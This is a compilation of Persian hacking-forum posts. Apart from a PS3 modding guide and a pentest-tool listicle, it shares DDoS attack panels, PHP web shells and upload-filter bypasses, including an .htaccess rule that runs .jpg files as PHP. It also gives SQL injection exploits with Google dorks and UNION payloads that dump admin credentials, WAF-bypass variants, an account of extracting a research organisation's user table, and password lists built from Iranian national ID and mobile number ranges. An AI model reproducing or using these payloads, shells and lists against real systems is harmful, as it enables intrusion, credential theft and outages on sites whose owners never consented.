تخته امتیازات

سلام خدمت کاربرای عزیز چند سالی غیر فعال بودم اما بالاخره مشکلات کمی کمتر شد و بالاخره میتونم در کنار شما باشم . یکی از آموزشاتی که در هیچ سایت و انجمنی ندیدم قرار بگیره روش های کرک ، هک ، فعالسازی و ... در کنسول های بازی هستش که بر فرض مثال نصب مود های gta v روی ps3 در هیچ سایت ایرانی وجود نداره . امیدوارم بزودی بخشی در انجمن برای موضوعات وابسته به کنسول ها نیز قرار بگیره که تاپیک رو انتقال بدم . خب دوستان قبل از انجام کار باید بگم که این آموزش صرفا برای کنسول های جیلبریک و کپی خور شده هستش و در آینده برای کنسول های orginal نیز تاپیکی قرار میدم . *نکته : نصب مود در کنسول ps3 تفاوت بسیار زیادی با PC و دیگر کنسول ها داره پس مرحله به مرحله پیش برید اطلاعات کنسول های مورد استفاده من : ( این روش بر روی تمامی کنسول های PS3 کپی خور عمل میکند ) PS3 Slim 120GB و PS3 Super Slim 240 GB CFW : 4.82 کبری و CFW : 4.81 فرکس ------------------------ در انتها و در پست های بعدی نسخه های مختلف مود لودر ( update ) و نسخه های مختلف مود بازی GTA V رو قرار میدم *نکته : این کار هیچ تغییری در اصل بازی نصبی شما ایجاد نمیکند و بازی شما از همان مرحله فعلی شما لود خواهد شد *نکته : مسئولیت اشتباه در حین انجام کار و اشکال در روند اجرای بازی با شما می باشد پس مراقب باشید و از بازی خودتون بکاپ تهیه کنید *نکته : سعی کنید به جای جایگزینی از تغییر نام و قرار دادن فایل ها در پوشه های مورد نظر استفاده کنید *نکته : برای برگشت دادن بازی به حالت عادی کافیست فایل های بوت و اپدیت رو به نسخه اصلی برگردونید و همچنین فایل sprx رو از قسمت tmp پاک کنید ***نکته : این آموزش برای اولین بار توسط بنده در این انجمن قرار داده میشه و بزودی نسخه فیلم برداری شده از کنسول های خودم رو نیز در همین تاپیک قرار میدم ----------------------- مرحله اول : چک کنید که برنامه Multiman روی کنسول شما نصب شده باشه . ( در صورت نصب نبودن به انتهای پست مراجعه کنید و سپس ادامه مراحل را انجام دهید ) مرحله دوم : فایل های آپلودی زیر را دانلود کنید مرحله سوم : فلش usb خود را به Fat32 فرمت کنید و سپس فایل های اکسترکت شده را در فلش قرار دهید مرحله چهارم : فلش را به کنسول متصل کرده و وارد محیط اصلی کنسول شوید مرحله پنجم : وارد مولتی من در دستگاه خود شده و به سربرگ اول مولتی من و File Manager mmOS برید مرحله ششم : پنجره های باز شده را ببندید و روی دکمه ps3 Root در بالای صفحه خود دوبار X را بفشارید مرحله هفتم : وارد بخش dev_usb000 شوید مرحله هشتم : موس خود را روی فایل EBOOT.BIN اورده و کلید O رو بزنید و در منو باز شده روی Copy دکمه X را بفشارید تا فایل کپی شود مرحله نهم : مجددا روی ps3 Root کلیک کرده و اینبار وارد بخش dev_hdd0 شوید مرحله دهم : وارد پوشه game شوید ( حروف کوچک و درونش پوشه های مختلف بازی های نصب شده روی کنسول را مشاهده میکنید ) مرحله یازدهم : همونطور که مشاهده میکنید پوشه های با نام های Bles0180 , Bles0170 و در اینجا قرار دارند ، خب بازی GTA V عموما با نام Bles1807 نمایش داده میشود که یک پوشه هم نام با پسوند instal در زیر آن مشاهده می شود ، وارد این پوشه شوید ( در صورت مشاهده نکردن این پوشه ، همه پوشه هارا باز کنید و روی icon کلیک کنید تا لوگو بازی رو ببینید و gta رو پیدا کنید ) مرحله دوازدهم : روی پوشه USRDIR که در داخل پوشه bles قرار گرفته کلیک کنید و سپس با زدن دکمه O روی دسته و paste فایل بوت را جایگزین ( replace ) فایل موجود کنید ( البته جهت محکم کاری و اینکه مراقب فایل اصلی بازی باشیم میتونید به جای جایگزین کردن نام فایل بوت اصلی رو تغییر بدید Rename و سپس paste کنید تا هر زمان که خواستید بازی رو به حالت اولیه برگردانید ) مرحله سیزدهم : همین کار انتقال و کپی رو با فایل update که در فلش خودتون دارید انجام بدید و دو فایل رو جایگزین کنید ( فایل آپدیت مود لودر هستش و مدل های مختلفی داره که در زیر قرار میدم ) مرحله چهاردهم : 80% کار کامل شده ، خب شما یک فایل دیگه در فلش خودتون دارید با پسوند sprx ، این فایل رو کپی کنید و اینبار وارد بخش tmp در dev_hdd0 کنسول خود بشید ( در صورت مشاهده نکردن این پوشه با دکمه های بالا و پایین آنالوگ (D-pad) پایین آمده تا پوشه را مشاهده کنید ) مرحله پانزدهم : با زدن کلید O فایل رو همین پوشه paste کنید مرحله شانزدهم : با فشردن کلید R1 روی دسته خود وارد بخش Games در مولتی من شوید و بازی gta v اینبار مود شده خود را فعال کنید تمام ------------------------ مولتی من : فایل دانلود شده را در usb خود قرار داده ، از قسمت game وارد بخش instal packege file بشید و فایل با پسوند pkg رو روی دستگاه خودتون نصب کنید دانلود MultiMan 4.82 از سرور CFA ( در صورتی که کاستوم فریمور دستگاه شما پایین تر می باشد ورژن پایین تر این برنامه را از سایت های دیگر دانلود کنید ) ----------------------- نام و آپشن های مود GTA V پیوست شده در زیر : mod loader : tony efzi نحوه فعال سازی R3+L3 mod menu : freedom V1.5 پسورد فایل ها : guardiran.org ---------------------------------------------- لینک دانلود : GTA V PS3 MOD Menu

سلام و خسته نباشید خدمت تمامی اعضای گاردایران و مدیران یه چند وقتی نبودم گفتم امروز بیام یه چیزی رو پست کنم که جایی ندیدم که باشه:) راجب انواع برنامه های دیداس و غیره قبلا دوستان تو تاپیک های مختلف توضیح دادن ولی تاحالا کسی پنل های اتک رو نزاشته بود، یا حداقل من ندیدم [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] این یه لیست از پنل های فری هستش که باهاش میتونید خیلی سایتا و سرور ها رو آف کنید و حتی بعضی از بهترین فایروال ها هم بعضی وقتا آف میشن(با پنل ipstreeser) در رابطه با کپی رایت هم منبع این آموزش هم سایت خودم بود که اسمی نمیارم، و تنها کسی هم که این پنل ها رو گذاشته خودم بودم پس فکر نکنم نیازی به کپی رایت باشه

با پیشرفت سریع فناوری و افزایش پیچیدگی سیستم‌های اطلاعاتی، حفاظت از داده‌ها و سیستم‌ها به یکی از مهم‌ترین دغدغه‌های سازمان‌ها تبدیل شده است. تست نفوذ یا Penetration Testing یکی از روش‌های اساسی برای ارزیابی امنیت سیستم‌ها و شبکه‌هاست. این فرآیند شامل شبیه‌سازی حملات و تلاش برای یافتن و بهره‌برداری از آسیب‌پذیری‌ها است. ابزارهای تست نفوذ به هکرهای اخلاقی این امکان را می‌دهند تا به‌طور موثری امنیت سیستم‌ها را بررسی کنند. در این مقاله، به بررسی جدیدترین و برترین ابزارهای تست نفوذ که در حال حاضر استفاده می‌شوند، خواهیم پرداخت. 1. OWASP Zed Attack Proxy (ZAP) OWASP ZAP یکی از محبوب‌ترین ابزارهای متن‌باز برای تست امنیت برنامه‌های وب است. این ابزار به شما امکان می‌دهد تا حملات مشترکی مانند XSS و SQL Injection را شبیه‌سازی کنید. ویژگی‌های کلیدی ZAP عبارتند از: محیط کاربرپسند و پلاگین‌های متعدد امکان اسکن خودکار و دستی برنامه‌های وب پروکسی برداری برای رهگیری و تحلیل ترافیک HTTP استفاده از ZAP: برای کسانی که تازه به دنیای هکینگ وارد شده‌اند، شروع با ZAP می‌تواند یک نقطه شروع عالی باشد، زیرا این ابزار به راحتی نصب و قابل استفاده است. 2. Burp Suite Pro Burp Suite Pro یک ابزار قدرتمند برای ارزیابی امنیت وب اپلیکیشن‌هاست. این ابزار امکانات گسترده‌ای برای تحلیل و شناسایی آسیب‌پذیری‌ها دارد. ویژگی‌های برجسته Burp Suite Pro شامل موارد زیر است: اسکن خودکار برای شناسایی آسیب‌پذیری‌ها ابزار جامع برای رهگیری و تحلیل ترافیک افزونه‌های قابلیت استفاده برای تست‌های خاص استفاده از Burp Suite Pro: با وجود هزینه، این نسخه امکاناتی فراتر از نسخه رایگان دارد و برای حرفه‌ای‌های امنیت و تیم‌های تست نفوذ ضروری است. 3. Cobalt Strike Cobalt Strike یکی از ابزارهای برتر در زمینه حملات پسا‌نفوذی و شبیه‌سازی حملات تیم قرمز است. این ابزار به کاربران این امکان را می‌دهد تا سناریوهای پیچیده حملات را شبیه‌سازی و اجرا کنند. ویژگی‌های اصلی شامل: امکانات گسترش نفوذ و حفظ دسترسی دسترسی به مدل‌های حمله آماده ابزارهای جامع برای فرماندهی و کنترل (C2) استفاده از Cobalt Strike: ابزاری ایده‌آل برای تیم‌های قرمز که می‌خواهند مدل‌های حمله پیچیده‌تری را در محیط‌های سازمانی آزمون کنند. 4. Empire Empire یک فریم‌ورک برای حملات پسا‌نفوذی است که به شما این امکان را می‌دهد تا بر روی سیستم‌های هدف خود دسترسی را حفظ و گسترش دهید. ویژگی‌های کلیدی Empire عبارتند از: ماژول‌های متنوع برای جمع‌آوری اطلاعات و گسترش دسترسی واسط کاربری خط فرمان با طراحی کاربرپسند پشتیبانی از زبان‌های مختلف برای توسعه و سفارشی‌سازی استفاده از Empire: این ابزار برای هکرهای اخلاقی که نیاز به انجام حملات جامع و پیچیده دارند، جذاب و حیاتی است. 5. BloodHound BloodHound مخصوص شناسایی و تحلیل مسیرهای حمله در محیط‌های Active Directory است. این ابزار از گراف‌ها برای نمایش ارتباطات و شناسایی آسیب‌پذیری‌ها استفاده می‌کند. ویژگی‌های اصلی: توانایی نمایش روابط کاربری و دسترسی‌ها امکان تحلیل و شبیه‌سازی مسیرهای حمله محیط کاربرپسند برای تحلیل سریع اطلاعات استفاده از BloodHound: برای شناسایی و تحلیل شبکه‌های Windows AD، این ابزار بی‌نظیر است و به سرعت به تحلیلگران امنیتی کمک می‌کند. 6. Metasploit Framework Metasploit یکی از مشهورترین ابزارهای تست نفوذ است که همچنان به‌طور مداوم به‌روزرسانی می‌شود. این فریم‌ورک برای طراحی و اجرای آزمایش‌های نفوذ و بهره‌برداری از آسیب‌پذیری‌ها به کار می‌رود. ویژگی‌ها شامل: کتابخانه گسترده از ماژول‌های بهره‌برداری امکان ایجاد و تست اسکریپت‌های سفارشی پشتیبانی گسترده و مستندسازی استفاده از Metasploit: به عنوان یک ابزار استاندارد در میان تحلیلگران امنیت و هکرهای اخلاقی استفاده می‌شود و به‌طور منظم به‌روز می‌شود. 7. Nmap Nmap یکی از اساسی‌ترین ابزارها برای کشف شبکه و پویش پورت است. این ابزار با قدرت بالا و انعطاف‌پذیری فوق‌العاده‌ای برای تست نفوذ به‌کار می‌رود. ویژگی‌های کلیدی Nmap عبارتند از: پشتیبانی از اسکن‌های گسترده و دقیق امکان شناسایی سیستم عامل و سرویس‌های فعال قابلیت سفارشی‌سازی از طریق اسکریپت‌های NSE استفاده از Nmap: یک ابزار ضروری برای مرحله شناسایی و اطلاعات‌یابی در تست‌های نفوذ. 8. Wireshark Wireshark یکی از برجسته‌ترین ابزارها برای تحلیل ترافیک شبکه است. با استفاده از این ابزار، تحلیلگران امنیتی می‌توانند ترافیک شبکه را بررسی و تجزیه‌وتحلیل کنند. ویژگی‌های کلیدی: توانایی رهگیری و تجزیه‌وتحلیل بسته‌های شبکه قابلیت فیلترگذاری پیچیده برای نمایش ترافیک مورد نظر پشتیبانی از اکثر پروتکل‌های شبکه استفاده از Wireshark: ابزاری است ضروری برای هر تحلیلگر امنیتی که می‌خواهد به نحو مؤثری ترافیک شبکه را مانیتور کند. 9. Sn1per Sn1per ابزاری خودکار برای تست امنیتی است که فرایندهای شناسایی و بهره‌برداری را منظم و سریع انجام می‌دهد. این ابزار به شکل یکپارچه عمل می‌کند: قابلیت اسکن خودکار و نیمه‌خودکار توانایی شناسایی گستره وسیعی از آسیب‌پذیری‌ها امکان استفاده در حالت تیمی برای جامع بودن تست‌ها استفاده از Sn1per: برای تیم‌های امنیتی که به سرعت و دقت بیشتری در شناسایی و تست نیاز دارند. 10. Amass Amass یک ابزار پیشرفته برای شناسایی دارایی‌های دیجیتال و جمع‌آوری اطلاعات درباره آن‌هاست. ویژگی‌های کلیدی آن شامل: شناسایی و کشف شبکه‌های سازمان توانایی پیمایش و تحلیل گسترده زیرساخت‌ها استفاده از منابع اطلاعاتی گسترده برای تحلیل و شناسایی استفاده از Amass: به تیم‌ها و تحلیلگران امنیتی کمک می‌کند تا وضعیت امنیتی جامع‌تری از دامنه و زیرساخت‌های تحت کنترل داشته باشند. خلاصه امیدوارم مفید بوده باشه و خوشتون اومده باشه و اگر دوست داشتین میتونیم توی همین تاپیک نصب تک به تک ابزار هارو بزارم واستون تا به ساده ترین روش ممکن ازشون استفاده کنید 🫡

شل Darkness فایل اصلی و فایل دیکد شده پیوست شدند ./ dark.php dark-decoded.php

سلام میشه کسی این آپلودر رو [Hidden Content] بایپس کنه یه فیلم بگیره من هرچی تلاش میکن نمیتونم لطفا با افزونه http live headr بایپس کنید ممنون

سلام دوست عزیز شما میحواید بایپس یاد بگیرید یا دیفیس اگر بایپس مسخواسد بنده بهترین ایزار رو براتون میگم که یاد بگیرید burp suite واگر میخواید دیفیس یاد بگیرید همون فایل html اپلود کنید ثبت کنید و نه میخواید امنیت و راهگار یاد بگیرید سای portswigger academj حتما همه اموزش هاش رو یاد بگیرید یک امنیت کار خوب میشید اینو تضمین میکنم .نکته اخر مطلالعه کنید ممنون یا حق

دوست عزیز تارکت شما لود نمیشه برا بنده

دوست عزیز زاهکارهای زیادی برا الو کردن در این توع میباشد برای مقال شما میتونید اخر فایلتون عدد بزنید برای مثال php6و غیره

با سلام خدمت دوستان عزیز گارد ایران در این تاپیک برای شما تارگت های مختلف sql injection رو قرار می دم که به صورت ویدئویی هست و ضبط کردم تا بتوانید تمرین کنید لذت ببرید . 😁 لینک کانال برای مشاهده ویدئو ها : [Hidden Content] چند نکته مهم :‌ لطفا اگر دوستی قصد ارسال پست دارد فقط به صورت ویدئویی باشد . تارگت در مورد sql injection باشد و بهتره تارگت با نکته ارائه شود . اسپم ارسال نکنید و اگر سوالی داشتید در بخش سوال و جواب ها بپرسید . و اگر پیشنهاد و یا چیزه دیگه ای بود به صورت خصوصی پیام دهید . (در این جا اسپم ارسال نشود ) تشکر 🙏 .

سلام اول گفته باشم که از یک شل اختصاصی استفاده کنید چون فایروال شل هایی مثل الفا رو میشناسه. بایپس های مختلفی وجود داره که یک سری رو اینجا قرار میدم: .php5 .php7 .PhP .php;.png .php%00.png و همچنین میتونید header رو تغییر بدید با ابزار برپ سویت و از اون طریق هم تست کنید. اگر سرچ کنید بایپس های rfu توی یوتیوب ویدئو زیاده. موفق باشید.

سلام، من یک وب سایت را برای آسیب پذیری اسکن کردم و برنامه یکسری آسیب پذیری با عنوان "Advanced SQL Injection - AND boolean-based blind - WHERE or HAVING clause" پیدا کرد: URL [Hidden Content] Method GET Parameter _ Attack 1') AND 3944=3944 AND ('GJLN'='GJLN *********** URL [Hidden Content] Method GET Parameter _ Attack field: [_], value [; select "java.lang.Thread.sleep"(15000) from INFORMATION_SCHEMA.SYSTEM_COLUMNS where TABLE_NAME = 'SYSTEM_COLUMNS' and COLUMN_NAME = 'TABLE_NAME' -- ] *********** URL [Hidden Content] Method GET Parameter _ Attack 1 and 0 in (select sleep(15) ) -- *********** URL [Hidden Content] Method GET Parameter _ Attack field: [_], value [(SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)] من وقتی آدرس بالا را در مرورگر می نویسم فقط یک ویدئو که در سایت وجود داره پخش میشه! چه جوری میتونم از این آسیب پذیری استقاده کنم؟ با تشکر.

بسم الله الرحمن الرحیم اسم این ابزار urlbuster هست یکی از بهترین و قدرتمند ترین ابزارها در زمینه پیدا کردن فایل ها و فولدر های مخفی وب سایت ها است که می توانید از آن استفاده کنید و آن را در انواع سیستم عامل ها هم نصب نمایید، در آموزش fuzzing یکی از ابزارهای دیگر در این زمینه را معرفی کرده‌ایم اما این ابزاری که در حال حاضر در حال معرفی آن هستیم یکی از بهترین آن ها است که شما به دلخواه خود می توانید یکی از این ابزارها را در تست نفوذ خود به کار ببرید و می‌توانید کار با هر دو این ابزارها را تجربه کنید. آموزش نصب و استفاده از ابزار برای جستجوی فایل ها و فولدر های مخفی وب سایت برای نصب این ابزار در لینوکس می توانید آن را از گیت هاب دانلود کنید و وارد دایرکتوری آن شده و سپس فایل نصبی آن را با استفاده از پایتون اجرا کنید: git clone [Hidden Content] cd urlbuster python setup.py راحت ترین راه نصب urlbuster دستور زیر است که به راحتی با pip نصب خواهد شد: pip install urlbuster بعد از اتمام نصب شما می توانید با دستور urlbuster ابزار را اجرا کنید. نکته: این ابزار دارای امکان ست کردن کوکی و پروکسی است و همچنین با استفاده از آن می توانید ورودی‌ها درخواست ها و موارد بسیار دیگر را بررسی کنید که بعد از اجرای آن با استفاده از سوئیچ راهنما می توانید بخش های مختلف آن را مشاهده کنید. برای آشنایی بیشتر با نحوه کار با این ابزار به دستور زیر توجه کنید، در این دستور با استفاده از سویچ w فایل ورد لیست ما که می‌خواهیم بروت فورس شوند را به ابزار می دهیم و سپس url مورد نظر خود را که می‌خواهیم وارد لیست بر روی آن تست شود را وارد می‌کنیم، بعد از اجرا و پایان کار ادرس فایل ها و فولدر های مخفی را اگر تشخیص داده باشد مشاهده می کنید. urlbuster -W file.txt [Hidden Content] منبع: Guardiran.org

به نام خدا سلام یک ویدیو ی ساده در مورد این موضوع تهیه کردم. Video.rar

با سلام خدمت دوستان . در این تاپیک اکسپلویت های sql injection رو میزارم برای دوستانی که به اسیب پذیری sql injection علاقمند هستند . Exploit 1 : Web Mingo I.T. Solutions - SQL Injection vulnerability ********************************************************* #Exploit Title: Web Mingo I.T. Solutions - SQL Injection vulnerability #Date: 2020-11-10 #Google Dork: "Design & Developed By Web Mingo I.T. Solutions" #Category:webapps #Tested On: windows 10, Firefox Proof of Concept: Search google Dork: "Design & Developed By Web Mingo I.T. Solutions" Demo : [Hidden Content],2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17--+ [Hidden Content],version(),3,4,5,6,7,8,9--+ [Hidden Content],2,3,4,version(),6,7--+

[Hidden Content],2,group_concat(username,0x3a,password),4,5,6,7,8,9,10+from+administrator-- - با سلام خدمت همه اعضای گارد ایران بچه ها یکم راجب بایپس این دستور کمک کنید هرکاری میکنم نمیتونم تمام روش های تو انجمن رو هم رفتم فایروال حساس به from هستش . بایپس هایی که رفتم این ها هستند. همش ارور forbidden میده !!! /*!50000from*/ /*!from*/ /**anything**/from

Exploit 6 : Powered by Shambhala.Travel - SQL Injection vulnerability #Exploit Title: Powered by Shambhala.Travel - SQL Injection vulnerability #Date: 2020-10-21 #Google Dork: "Powered by Shambhala.Travel" #Category:webapps #Tested On: windows 10, Firefox Proof of Concept: Search google Dork: "Powered by Shambhala.Travel" Demo : [Hidden Content],2,VERSION(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--+ [Hidden Content],2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56-- [Hidden Content],2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--+

Exploit 2 : Designed by Launch Web Dreams - SQL Injection vulnerability #Exploit Title: Designed by Launch Web Dreams - SQL Injection vulnerability #Date: 2020-11-07 #Google Dork: "Designed by Launch Web Dreams" #Category:webapps #Tested On: windows 10, Firefox Proof of Concept: Search google Dork: "Designed by Launch Web Dreams" Demo : [Hidden Content],22222,33333,version(),55555,66666,77777,88888--&Type=Men [Hidden Content],2222,3333,4444,version(),6666,7777,8888,9999--&Type=Mask * Results are displayed in the source

ویدئوی اول سایت مورد نفوذ :‌ [Hidden Content] ادرس: view-source:[Hidden Content]/details.php?aid=4-6+union+select+1,2,3,4,group_concat(username,0x3a,password,0x3c62723e),6,7+from+tbl_adm_users-- خط ۹۹ در سورس ، پسورد هش شده که در ویدئو کرک هم می کنیم . اگه کیفیت پایین هست به این لینک مراجعه کنید : [Hidden Content]

درود، احتمالا نیاز به بایپس WAF دارید متود های زیر رو تست کنید: +ORDER+BY+99999 +/*!13337ORDER*/+/*!13337BY*/+99999 +/*!50000ORDER*/+/*!50000BY*/+99999 +OrdER+bY+99999 اخر هرکدومشون هم کاراکتر های زیر رو بزارید: -- - -- %23 به طور مثال +OrDEr+bY+99999 -- -

سلام خدمت دوست عزیز گارد ایران. در این تاپیک قصد دارم بهترین و پرکاربرد ترین شل هارو قرار بدم. امیدوارم لذت ببرین. اولین شل:adminer adminer-3.6.3.rar

یه ورد لیست ۴ مگ هم من آپلود میکنم امیدوارم به دردتون بخوره اگر مورد پسندواقع شد بگید تا پس لیست های خودمو براتون قرار ب دم! guardiranteam passlist.txt

یک شل برای دور زدن آپلودر عکس که به سایز تصویر گیر میده [Hidden Content] اینم پست دوست خوبم rex که آموزش آپلود شل در انواع سی ام اس رو آموزش داده [Hidden Content]

[Hidden Content] یه شل با فرمت jpg براتون میزارم که آپلودرهایی که به اندازه عکس و این چیزا گیر میدن رو بایپس میکنه ولی برای اینکه خودش به صورت jpg هم بتونه اجرا بشه باید این کد رو داخل .htaccess بزارید و اپلود کنید 😐

یه شل با فرمت jpg براتون میزارم که آپلودرهایی که به اندازه عکس و این چیزا گیر میدن رو بایپس میکنه ولی برای اینکه خودش به صورت jpg هم بتونه اجرا بشه باید این کد رو داخل .htaccess بزارید و اپلود کنید 😐 <FILESMATCH "^.*/.jpg"> SetHandler application/x-httpd-php </FILESMATCH> shell.rar

شل.rarبا سلام نزدیک ده تا شل پر کاربرد برای شما اماده کردم ا میدوارم خوشتون بیاد

باسلام به همه دوستان دوست عزیز در شرکت های بزرک میان در ایکس چنج سرور یه کاری میکنن البته ینده تارکت شمارو ندیدم و بصورت کلی میگم که این چنین هم میشه مثلا دانشگاهی که خود بنده .... احتمالا شما با چنین سرورهایی برخورد کردید چون بنده با دوست عزیز 1tedروی سروری کار میکردیم برای یک سازمان پزوهشی بود که اسکیوال داشت و ما کیه کاربرانو در اوردیم بجز ادمین که بعدا فهمیدم زیرساختشون این چنین بوده شما میتونین با جمع اوری اطلاعات دقیق از سرور بفهمید که ایا یوزر ادمین در داخل یکی از اون تیبل هاس یا در یک سرور دیکه قرار داره باز یادم رفته بود اکه با ابزارهای تزریق خوب کار کرده باشید با همونا میتونید مستقیم یک اپلودر یا شل اپلود کنید

فک نکنم بتونه گود نده پسورد لیست برای همه چیز مخصوصا کرک پسورد WiFi حجم : زیاد Real-Passwords-Rev1_2-targz.torrent Real-Passwords-Rev1_2-7z.torrent Dict-Style-Rev1_2-7z.torrent Dict-Style-Rev1_2-targz.torrent

با سلام دوستان یک پسورد لیست از اسامی اسم های ایرانی اماده کردم. پسورد فایل: guardiran.org passlist.rar تشکر نشانه رضایت شماست

با سلام دوستان پسورد لیست کد های ملی 458 و 459 و شماره موبایل همراه اول (0912) رو براتون قرار دادم. پسورد فایل: guardiran.org pass.rar تشکر نشانه رضایت شماست

با سلام شماره های 0936 رو قرار دادم. پسورد فایل: guardiran.org 0936.rar تشکر نشانه رضایت شماست

با سلام پسورد لیست شماره های همراه اول (0919). پسورد فایل: guardiran.org Hamrahe Aval.rar تشکر نشانه رضایت شماست

این پسورد لیست ( Password List ) یکی از بهترین و کاملترین پسورد لیستهاست که شامل : پسورد لیست علامت Symbol Passwrd list پسورد لیست اعداد Nuber Password List پسورد لیست حروف Characters Password List ,... پسورد فایل : guardiran.org Password List.rar

این پسورد لیست که براتون در فایل ضمیمه قرار دادم آمیخته ای از : علامت اعداد حروف کلمات اسامی و.. هست و حدود چندین هزار پسورد رو در خودش داره و ممکنه در بسیاری از مراحل بکارتون بیاد بدلیل اینکه از پسورد هایی انتخاب شده که در اکثریت اوقات جوابگو هست . پسورد فایل : guardiran.org . PassList.rar

درود پسورد لیست برای پسورد های انگلیسی. موفق باشید. پسورد فایل : guardiran.org pw list 1.rar

درود این یک پسورد لیست دست ساز هست و پسورد های که توش بکار رفته پسورد های هست که اکثرا از آن استفاده میکنند. پسورد : guardiran.org pass list ds.rar

لیست یوزر های آلمان ( germany user list ) : admin1 1admin Administrator Administrator1 administrator2 user user1 user2 user3 user4 Test test1 test2 test3 test4 nomen Benutzername hospes guest1 dominus master1 Server server1 remota remote1 Desktop